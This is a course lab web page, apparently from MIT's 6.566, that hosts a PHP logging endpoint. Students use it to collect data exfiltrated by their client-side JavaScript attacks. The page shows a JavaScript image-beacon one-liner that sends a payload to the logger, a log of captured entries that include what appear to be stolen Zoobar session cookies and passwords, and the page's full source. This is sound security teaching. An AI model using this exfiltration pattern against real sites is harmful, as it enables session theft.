Lab 4 Logging Script

You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload: 

(new Image()).src='https://css.csail.mit.edu/6.566/2026/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();

The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.

Test form

If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)


(some identifier to locate your payload in the log)


(the information you stole)

Logged entries

Below are the most recent logged entries, so that you can check if your attack worked: 

Tue, 16 Jun 2026 05:27:43 +0000: cris: PyZoobarLogin=grader#5357392f7aa919f1a7b031dc7f4258e2
Tue, 16 Jun 2026 05:27:37 +0000: cris: PyZoobarLogin=grader#1741aede6ad16807dda3b139b4f4d2dd
Tue, 16 Jun 2026 05:27:24 +0000: cris: PyZoobarLogin=grader#a0d9ead4b7330b41dfcfd734e2ac9adc
Tue, 16 Jun 2026 05:20:25 +0000: cris: PyZoobarLogin=grader#1c30ae08d83f53f3c2f1feee35112fbf
Tue, 16 Jun 2026 05:20:19 +0000: cris: PyZoobarLogin=grader#c3f6208bc6ba0226870d2ef962868605
Tue, 16 Jun 2026 05:20:06 +0000: cris: PyZoobarLogin=grader#442b996fac07f3279ea2d90e1aeac747
Tue, 16 Jun 2026 04:21:55 +0000: my-username: some-string
Tue, 16 Jun 2026 04:07:07 +0000: cris: alalala/12345
Tue, 16 Jun 2026 04:06:04 +0000: cris: hola/12345
Tue, 16 Jun 2026 04:04:02 +0000: cris: sech/1234
Tue, 16 Jun 2026 04:03:44 +0000: cris: sech/1234
Tue, 16 Jun 2026 04:03:35 +0000: cris: sechito/1234
Tue, 16 Jun 2026 04:02:01 +0000: cris: sechito/1234
Tue, 16 Jun 2026 03:59:48 +0000: cris: sechito/1234
Tue, 16 Jun 2026 03:59:23 +0000: cris: sechito/1234
Tue, 16 Jun 2026 03:56:34 +0000: cris: sechito/1234
Tue, 16 Jun 2026 02:52:05 +0000: cristofer: PyZoobarLogin=sechito#a54e6ae412052a6392aba0730fdc99ef
Tue, 16 Jun 2026 02:51:38 +0000: cristofer: PyZoobarLogin=sechito#a54e6ae412052a6392aba0730fdc99ef
Tue, 16 Jun 2026 02:50:54 +0000: cristofer: PyZoobarLogin=sechito#a54e6ae412052a6392aba0730fdc99ef
Tue, 16 Jun 2026 02:48:58 +0000: cristofer: PyZoobarLogin=sechito#a54e6ae412052a6392aba0730fdc99ef
Tue, 16 Jun 2026 02:46:17 +0000: cris: PyZoobarLogin=sechito#a54e6ae412052a6392aba0730fdc99ef
Tue, 16 Jun 2026 01:56:03 +0000: cris: PyZoobarLogin=sechito#a54e6ae412052a6392aba0730fdc99ef

Source code

In case you are curious, here is the source code of this page.

<?php
header("Access-Control-Allow-Origin: *");

do {
    if (!array_key_exists("id", $_REQUEST)) {
        break;
    }

    $id = $_REQUEST['id'];
    if (strlen($id) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "ID value is larger than 1000 bytes";
        return;
    }

    if (!array_key_exists("payload", $_REQUEST)) {
        header("HTTP/1.0 400 Bad Request");
        echo "No payload given";
        return;
    }

    $payload = $_REQUEST['payload'];
    if (empty($payload)) {
        header("HTTP/1.0 400 Bad Request");
        echo "Empty payload given";
        return;
    }

    if (strlen($payload) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "Payload is larger than 1000 bytes";
        return;
    }

    if (!function_exists('apcu_add')) {
        header("HTTP/1.0 501 Not Implemented");
        echo "APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }

    if (apcu_add($payload, true, 5) === false) {
        // exact same $payload was sent in the past 5 seconds
        header("HTTP/1.0 429 Too Many Requests");
        echo "That exact payload was sent very recently; rejecting";
        return;
    }

    $payload = str_replace(array("\n", "\r"), '.', $payload);
    $id = str_replace(array("\n", "\r"), '.', $id);

    $file = fopen("/tmp/6.566-2026-logger.txt", "c+");
    if ($file === false) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to open log file";
        return;
    }

    if (!flock($file, LOCK_EX)) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to lock log file";
        return;
    }

    $lines = array();
    while (!feof($file) && count($lines) < 100) {
        $lines[] = fgets($file);
    }
    ftruncate($file, 0);
    rewind($file);
    fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
    foreach ($lines as &$line) {
        fwrite($file, $line);
    }

    flock($file, LOCK_UN);
    fclose($file);

    echo "Logged!";
    return;
} while(0);

$link = "(new Image()).src="
      . "'https://css.csail.mit.edu/6.566/2026/labs/log.php?'"
      . " + 'id=my-username'"
      . " + '&payload=some-string' + '&random='"
      . " + Math.random()";
?><!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" type="text/css" href="labs.css" />
        <title>Lab 4 Logging Script</title>
    </head>
    <body>
        <h1>Lab 4 Logging Script</h1>
        <p>
            You can use this server side script to extract data from
            client-side JavaScript. For example, clicking this client-side
            hyperlink will cause the server to log the payload:
        </p>
        <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
        <p>
            The random argument is ignored, but ensures that the browser
            bypasses its cache when downloading the image. We suggest that you
            use the random argument in your scripts as well.  The ID argument
            will help you distinguish your log entries from those sent by other
            students; we suggest picking your MIT Athena username.  Newlines are not
            allowed in <tt>javascript:</tt> links; if this bothers you, try
            <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
        </p>

        <h2>Test form</h2>
        <p>
            If you just want to try out the script, you can use this form.
            (For your actual attacks in lab 4, you'll probably want to use the
            JavaScript image technique shown above.)
        </p>

        <form method="GET" action="">
            <label for="id">ID:</label><br />
            <input name="id" placeholder="your-mit-username" size="40" />
            <i>(some identifier to locate your payload in the log)</i>
            <br />
            <br />
            <label for="payload">Payload:</label><br />
            <input name="payload" placeholder="some-string" size="40" />
            <i>(the information you stole)</i>
            <br />
            <input type="submit" value="Log" name="log_submit" />
    </form>

    <h2>Logged entries</h2>
    <p>
        Below are the most recent logged entries, so that you can check
            if your attack worked:
    </p>

    <pre class="tty"><?php
        $lines = file_get_contents("/tmp/6.566-2026-logger.txt");
        echo htmlspecialchars($lines);
    ?></pre>

        <h2>Source code</h2>
        <p>In case you are curious, here is the source code of this page.</p>
        <pre><?php highlight_file(__FILE__); ?></pre>
    </body>
</html>